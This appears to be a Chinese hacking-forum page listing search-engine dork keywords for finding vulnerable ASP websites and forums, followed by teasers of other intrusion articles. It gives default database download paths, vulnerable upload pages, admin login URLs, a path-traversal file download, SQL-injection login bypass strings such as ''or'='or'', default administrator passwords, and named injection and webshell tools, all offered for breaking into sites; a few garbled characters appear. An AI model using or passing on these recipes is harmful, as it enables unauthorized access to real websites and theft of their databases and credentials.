入侵搜索关键字
所属分类:
网络安全 / 黑客入侵
阅读数:
182
收藏 0赞 0分享
默认数据库: Databases/myszw.mdb Databases/myszw1.mdb
上传 upload_Photo.asp?PhotoUrlID=3 upload_Photo.asp?PhotoUrlID=1
----------------------------------------------------
关键字:网站建设公司企业网站管理系统
后缀: admin/login.asp
---------------------------------------
关键字:网梦购物系统 gCS木马
GOOGLE里搜索关键字:
上面的这个名字只是该留言者使用的昵称,不代表任何管理员身份!
把index.asp换成 mdb/vcsbook.asp
代码:
---------------------------------------
关键子:inurl:Went.asp
后缀:manage/login.asp
密码:'or''=''or'
============================
关键字:acblog
blogdata/acblog.asa 默认数据库。
=======================================
关键字:Copyright ? 2005-2008??Power
然后写入默认数据库:databass/datashop.asp
在网址后面加上主页后面加上:linktianjia.asp
申请连接输入一句话代码:
或者点下面的管理入口 密码:'or'='or'
一句话连接的时候在网站后面加上:databass/datashop.asp
========================================================
关键词 co net mib ver 1.0 design by hypo
搜索网站 http://www.yahoo.cn
密码 'or'='or'
==============================================
新云漏洞:把/flash/downfile.asp?url=uploadfile/../../conn.asp提交到网站根目录。就可以下载conn.asp 找到数据库地址比如 www.123.com 这个站 那么数据库地址就是 http://www.123.com/database\xzws.mdb 大家时常碰到数据库如果前面或者中间 了# 可以用#替换就可以下载了如:#xzws.mdb 改成#xzws.mdb 那么数据库就是http://www.123.com/database\#xzws.mdb然后下载 数据库
======================================================
网站猎手 一句话木马
关键字:Powered by BBSXP 7.00
后缀:DataBase\BBSXP7.mdb
默认后台:/bbsxp/Login.asp
=====================================
关键字:Management Ver 3.0 Build 20030628
后缀:upload.asp
一:网站猎手 t0/fF'GZD
二:明小子
三:ASP木马 =DUs
====================
密码:'or'='or'
搜索:WEB Manage Ver 1.0
LQT Ver 1.0 Design By wm 6
Web Development By Ver 1.0 Final
Web Management Ver 1.0 Design By Ck8
=====================================
edit.asp?table=
edit.asp?boardname=
action=
cnunews=
news_main&acode=
asp?id=1
asp?id=2
&idx=
edit.asp?idx=
啊D注入工具 百度搜索
=========================
搜索:Co Net MIB Ver 1.0网站后台管理系统
===============================================
用到工具:挖掘鸡
后缀添加:admin/login.asp
搜索关键词:申请会员有什么好处?
密码:'or'='or'
=================================
啊D注入工具--百度----关键子:admin
====================================
挖掘机关键字:Powered by WEBBOY页面:/upfile.asp
网站猎手关键字:Powered by mypower 后缀:upfile_photo.asp
upfile_softpic.asp
upfile_adpic.asp
======================
关键字:Power BY:VenShop V7.01 Copyright:VenShop.Com
密码:'or'='or'
======================= ;:
关键字:powered by mypower
漏洞页面:upfile_photo.asp
Upfile_Soft.asp
upfile_adpic.asp
upfile_softpic.asp
===============================
关键字:选购->加入购物车->去收银台->确认收货人信息->选付款方式->选配送方式->在线支付或下单后汇款->汇款确认->发货->完成
漏洞页面:upload.asp
upfile_flash.asp
=============================
网上搜索 inurl:manage/login.asp
======================================
关键字:Power BY:VenShop V7.01
后台地址:ad_login.asp
密码:'or'='or'
====================
关键字:Powered by WEBBOY
后缀:/upfile.asp
工具:明小子上传
====================
关键词:inurl: asp?=数字
inurl: php?=数字
===========================
关键字:went.asp
后缀:manage/login.asp
==========================
添加后缀/msmir_net.mdb
搜索:inurl:Msmir_DownLoads
===============================
关键字Powered By :SMT Version 5.0
后缀:upfile_flash.asp
===========================
关键字:你要入侵的类别 inurl:asp
工具:啊D注入工具
==================================
========================================
一、入侵BBSXP系统:
用到的工具:网站猎手 数据库小助手 MD5密码破解工具
关键词:广告合作
管理员登陆地址:BBS主页
默认数据库地址:/DATABASE/BBSXP.MDB
-----------------------------------------
二、入侵动网论坛
用到工具:网站猎手 数据库小助手 MD5密码破解工具
关键词:powered by dvbbs
默认数据库地址:data/dvbbs7.mdb 或者Databackup/dvbbs7.mdb或者bbs/Databackup/dvbbs7.mdb
或者/bbs/Data/dvbbs7.mdb
管理员登陆地址:BBS主页
默认管理员帐号密码:admin admin888
--------------------------------------
三、入侵新云系统
用到的工具:数据库小助手 MD5密码破解工具 挖掘鸡 ?N 6'*2{NT
eIEr\X4\~~
关键词:本站所提供的程序均来自于 Internet 所以无法保证下载后一定可以安装
管理员登陆地址:/admin/admin_login.asp U
默认数据库:database/#newasp.mdb(因为加了#在浏览器是无法连接的。所以我们要改成#)
database/#newasp.mdb
默认管理员帐号密码:admin admin
-----------------------------------
四、入侵无忧传奇系统
用到的工具:网站猎手 数据库小助手 MD5密码破解工具
关键字: inurl:Msmir_DownLoads
默认数据库地址:数据库连接:/msmir_net.mdb 或/msmir/msmir.mdb
管理员登陆地址:admin.asp
默认管理员帐号密码:msmir msmir
XSS Phishing - 新式跨站脚本攻击方式(图)
最近跨站脚本漏洞好像比较火,国内的一些比较出名的WEB程序都陆续暴出了跨站脚本漏洞,但是一提到跨站脚本漏洞的攻击方式大家都哑火了,因为在常规的概念中这种漏洞最多是挂网页木马,获取COOKIE之类,属于典型的鸡肋漏洞!
跨站脚本攻击最大的魅力是通过HTML注
收藏 0赞 0分享
PHP数据库安全之SQL注入
$offset = $argv[0]; // 注意,没有输入验证!
$query = "SELECT id, name FROM products ORDER BY name LIMIT 20 OFFSET $offset;";
$resu
收藏 0赞 0分享
传世木马盗号过程分析
玩传世已经有一段时间了,以前对木马盗号之类的事情总是听的很多,但是从来没有碰到过,自从玩了传世开始,让小弟我着实领教了一次什么叫木马盗号,那个厉害阿。以至于现在上网都怕怕,怕中招。好废话不说,来分析一下木马盗号的原理(如果有那位大侠认为不够准确或是原理有所出入
收藏 0赞 0分享
浅析*NIX机器的入侵
目前来说*NIX机器早已经成为INTERNRT的主流服务器操作系统了,UNIX系列系统的优势相WINDOWS比较而言优势也是显而易见的。
而与之接口的脚本目前来说是以PHP MYSQL为主。当然也不乏大公司用JSP和CGI和PL,不过CGI和PL的处理相对比较困难一点,容易造
收藏 0赞 0分享
一次透过SNIFF有目的性的入侵
一次透过SNIFF有目的性的入侵
所用武器:流光,SUPERSCAN3,HDOOR,NETCAT,3389客户端,X-SNIFF
宿舍装了ADSL,我疯狂地在网上看电影和在QQ里泡MM(也可能是恐龙吧 :( )。网络入侵和安全方面的学习已经荒废了好一段时间
收藏 0赞 0分享
渗透日本服务器群
因为这一局,渗透获取整个服务器群的权限,N台服务器。所以写篇文章小小虚荣下。^0^
开局:
入手点是一个注射点:sa,内网, 轻车熟路写个vbs脚本,下好lcx,转发端口。
以下是引用片段:
down.vbs
iLocal = LCase(WScript.Ar
收藏 0赞 0分享
黑客入侵“在线影院”全过程2
遇阻:寻找VOD电影
首先运行Windows XP自带远程登录器mstsc.exe,填入对方的IP地址218.147.*.*,确定后在登录界面填上我刚创建的用户名hacker和密码12345,顺利地进入了对方的Windows 2000桌面。
可随后
收藏 0赞 0分享
黑客入侵“在线影院”全过程1
最近对网上看电影比较感兴趣,于是登录至某“在线影院”。本以为是免费,谁知问我要账号和密码,我可不想为这个掏钱。怎么办?先探探路
收藏 0赞 0分享
入侵藏在防火墙后面的机子
事情是这样的:
遭遇一台湾的dns服务器,win2003 server
扫描器报告的开放端口:21,53,80
ok,弄到一个sa权限的注射点,很爽得拿到一个webshell,透过sqlrootkit,俺就是system权限了.本以为对方菜到家了.谁知故事才刚刚开始.
收藏 0赞 0分享
看清黑客穿透ADSL路由入侵内网
也许看烂了网上已有的常规黑客攻击手段,对一些陈旧的入侵手法早已厌烦,近来我对ADSL MODEM的路由功能产生了浓厚的兴趣,经过一番努力,我终于找到了穿透ADSL路由入侵内网的方法,在这里和各位一起分享我的心得。
一.扫描
现在很多ADSL MODEM都是通过80、2
收藏 0赞 0分享
查看更多